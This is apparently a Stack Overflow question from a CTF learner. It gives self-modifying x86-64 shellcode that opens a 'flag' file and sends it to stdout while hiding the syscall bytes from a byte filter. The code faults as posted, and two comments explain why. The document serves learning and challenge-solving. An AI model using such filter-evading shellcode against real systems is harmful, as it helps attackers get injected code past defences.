# RIP stuck at inc instruction in self-modifying shellcode

Tags: linux, assembly, x86-64, gnu-assembler, shellcode

I'm working on a ctf-like challenge and it is filtering my shellcode to make sure I don't have the hex value encodings of the syscall, sysenter and int instructions 0x0f05 0x0f34 and 0x80cd respectively. I have a shellcode that can open a file and read it through sendfile but it includes the syscall instruction.

[Is there a way to write shellcode for sendfile that does not use syscall instruction directly?](https://stackoverflow.com/questions/52620930/is-there-a-way-to-write-shellcode-for-sendfile-that-does-not-use-syscall-instruc)

I have read the above question and applied the method described in one of its answers to my shellcode. But it's not working.

This is the assembly code (GAS intel syntax)

```
    .globl _start

_start:
    .intel_syntax noprefix
    mov rbx, 0x67616c66
    push    rbx
    mov rax, 2
    mov rdi, rsp
    mov rsi, 0
    inc     byte ptr syscall_loc1[rip]
    jmp     syscall_loc1
syscall_loc1:
    .byte 0x0e, 0x05

    mov rdi, 1
    mov rsi, rax
    mov rdx, 0
    mov r10, 1000
    mov rax, 40
    inc     byte ptr syscall_loc2[rip]
    jmp syscall_loc2
syscall_loc2:
    .byte 0x0e, 0x05

    mov rax, 60
    inc     byte ptr syscall_loc3[rip]
    jmp syscall_loc3
syscall_loc3:
    .byte 0x0e, 0x05
```

Whenever I execute the ELF obtained by `gcc -static -nostdlib -o shellcode-elf shellcode.s`, it's returning

> Segmentation fault (core dumped)

I opened it in pwndbg, set the breakpoint at _start, and stepped through the code with *si*.

It's always getting stuck at the *inc* instruction. No matter where I place the *inc* instructions, at the start or just before the *syscall_loc* labels, when I reach an *inc* instruction, any further *si* or *ni* or *continue* doesn't change the *rip*.

I'm relatively new to assembly, and any help would be much appreciated.

If there's another way of achieving the process of calling *sendfile* and *open* without writing **0f 05**, please mention.

Comment: The `.text` section gets linked into a read-only + exec page of memory, unlike in a code-injection exploit where your code would normally be in a RWX page.  Also note that `jmp     syscall_loc1` is basically a nop so it's pointless.

Comment: Also, RIP doesn't get "stuck", it faults.  (Transferring RIP to the kernel, and then to a SIGSEGV handler if you installed one).  Possibly other people that don't know standard terminology will find your question (and the answer on the linked duplicate).